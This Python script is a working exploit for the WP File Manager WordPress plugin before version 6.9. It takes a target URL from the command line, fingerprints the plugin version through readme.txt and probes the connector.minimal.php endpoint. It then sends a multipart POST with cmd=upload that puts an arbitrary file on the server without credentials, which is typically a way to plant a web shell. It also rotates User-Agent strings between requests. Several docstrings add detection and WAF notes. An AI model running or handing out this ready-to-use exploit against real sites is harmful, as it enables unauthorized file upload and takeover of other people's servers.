import argparse
import requests
import re
import sys
import os
import json
import random
# Pool of desktop-browser User-Agent strings. Each request helper below picks
# one with random.choice(), so the User-Agent header differs between requests.
# Detection note: the header is therefore not a stable indicator for traffic
# from this script; the requested plugin paths are.
user_agents = [
    # Windows
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0',
    # macOS
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55',
    # Linux
    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/92.0.902.55',
]
def create_parser():
    """Build the command-line interface for this script.

    Returns:
        argparse.ArgumentParser: a parser with one positional ``url`` plus the
        optional ``--upload-file`` (string, default ``None``) and the boolean
        switches ``--check`` and ``--verbose``.
    """
    cli = argparse.ArgumentParser(description='Exploit WP File Manager plugin')
    cli.add_argument('url', metavar='url', type=str, help='WordPress target URL')
    cli.add_argument(
        '--upload-file',
        dest='upload_file',
        type=str,
        default=None,
        help='File to upload',
    )

    # Both switches are plain on/off flags that default to False.
    switches = (
        ('--check', 'check', 'Check if WP File Manager plugin is vulnerable'),
        ('--verbose', 'verbose', 'Enable verbose output'),
    )
    for flag, dest, help_text in switches:
        cli.add_argument(flag, dest=dest, action='store_true', help=help_text)

    return cli
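def check_wp_file_manager_version(url):
    """Report the wp-file-manager version advertised by the plugin's readme.txt.

    Fetches ``<url>/wp-content/plugins/wp-file-manager/readme.txt``, takes the
    first dotted version number that follows the ``== Changelog ==`` heading
    and compares it numerically with 6.9, the release this script treats as
    patched. Versions are compared as integer tuples, so a multi-digit
    component (for example ``10.0``) is no longer truncated and misreported as
    an old release.

    NOTE(review): readme.txt is static text served from the plugin directory;
    it may be missing, blocked or out of step with the installed code, so the
    result is a hint rather than proof. Defenders can use the same comparison
    to inventory hosts that still need the update to 6.9 or later.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.

    Side effects:
        Prints the finding. When the version is not identified as older than
        6.9 (or cannot be detected) the user is prompted on stdin and the
        process exits via ``sys.exit()`` unless they answer ``y``/``yes``.
        A failed request also prints an error and exits.
    """
    target_endpoint = f"{url}/wp-content/plugins/wp-file-manager/readme.txt"
    user_agent = random.choice(user_agents)
    patched_version = (6, 9)

    try:
        response = requests.get(target_endpoint, headers={'User-Agent': user_agent}, timeout=5)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred while checking {url}: {e}")
        sys.exit()

    # Capture the whole dotted version, not just one digit on each side of the
    # first dot, so that e.g. "10.0" is not read as "0.0".
    match = re.search(r'== Changelog ==.*?(\d+(?:\.\d+)+)', response.text, re.DOTALL)
    if match:
        version = match.group(1)
        print(f"[+] Found wp-file-manager version: {version}")
        # Compare numerically; comparing the strings would order "10" before "6".
        found = tuple(int(part) for part in version.split('.'))
        is_vulnerable = found < patched_version
        if is_vulnerable:
            print("[+] Version appears to be vulnerable")
        else:
            print("[-] Version doesn't appear to be vulnerable")
    else:
        print("[-] Unable to detect version. May be wp-file-manager plugin not installed.")
        is_vulnerable = False

    if not is_vulnerable:
        choice = input("Do you still want to continue (y/N): ")
        if choice.lower() not in ('y', 'yes'):
            print("Exiting...")
            sys.exit()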
def check_wp_file_manager(url):
    """Check whether the plugin's connector script answers a plain GET.

    Runs the readme-based version check first (which may prompt or exit), then
    requests ``lib/php/connector.minimal.php`` under the plugin directory with
    no credentials. If the body contains ``{"error":["errUnknownCmd"]}`` the
    target is reported as vulnerable; any other body is reported as not
    vulnerable.

    Detection/mitigation note: the probe is a GET to that connector path, so
    access logs and WAF rules can key on the path regardless of User-Agent.
    The version check in this script treats 6.9 as the patched release.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
    """
    check_wp_file_manager_version(url)

    connector = f"{url}/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    headers = {'User-Agent': random.choice(user_agents)}
    # Literal JSON body the connector returns when it is reached without a command.
    marker = '{"error":["errUnknownCmd"]}'

    try:
        reply = requests.get(connector, headers=headers, timeout=5)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred while checking {url}: {e}")
        return

    if marker in reply.text:
        print(f"[+] Target: {url} is vulnerable")
    else:
        print(f"[-] Target: {url} is not vulnerable")
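def exploit_wp_file_manager(url, file_upload, verbose):
    """POST a local file to the plugin's connector script and report the result.

    Sends a multipart request with ``cmd=upload`` to
    ``lib/php/connector.minimal.php`` under the plugin directory; no
    credentials or cookies are attached. The JSON reply's ``added[0].url`` is
    printed as the upload location when present.

    Detection/mitigation note: the request is an unauthenticated multipart
    POST to that connector path carrying ``cmd=upload``; web-server logs and
    WAF rules can match on the path and the command. The version check in this
    script treats 6.9 as the patched release.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        file_upload: Path of the local file to send.
        verbose: When true, print the request method, URL and headers and the
            response status code.
    """
    target_endpoint = f"{url}/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    user_agent = random.choice(user_agents)
    form_fields = {
        'reqid': '17457a1fe6959',
        'cmd': 'upload',
        'target': 'l1_Lw',
        'mtime[]': '1576045135',
    }
    try:
        # Context manager closes the local file handle, which was previously
        # left open for the life of the process.
        with open(file_upload, 'rb') as handle:
            response = requests.post(
                target_endpoint,
                headers={'User-Agent': user_agent},
                timeout=5,
                data=form_fields,
                files={'upload[]': handle},
            )
        if verbose:
            print("Request method:", response.request.method)
            print("Request URL:", response.request.url)
            print("Request headers:", response.request.headers)
            print("="*50)
            print("Response status code:", response.status_code)
        # An empty "added" list previously raised IndexError; treat it as a
        # failed upload instead.
        added = response.json().get('added') or [{}]
        file_upload_url = added[0].get('url')
        if file_upload_url:
            print(f"[+] File uploaded successfully.\nLocation: {file_upload_url}")
        else:
            print("[-] File upload failed.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred while exploiting {url}: {e}")
        return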
if __name__ == "__main__":
    # Script entry point: parse arguments, then either run the check-only
    # path or validate the local file and hand off to the upload routine.
    args = create_parser().parse_args()
    wp_url, upload_file = args.url, args.upload_file
    verbose, check = args.verbose, args.check

    if check:
        check_wp_file_manager(wp_url)
        sys.exit()

    # Validate the local file argument before any request is sent; the first
    # failing condition decides the message.
    problem = None
    if upload_file is None:
        problem = "[-] No file specified."
    elif not isinstance(upload_file, str):
        problem = "[-] Invalid file name."
    elif not os.path.isfile(upload_file):
        problem = "[-] File not found."

    if problem is not None:
        print(problem)
        sys.exit()

    exploit_wp_file_manager(wp_url, upload_file, verbose)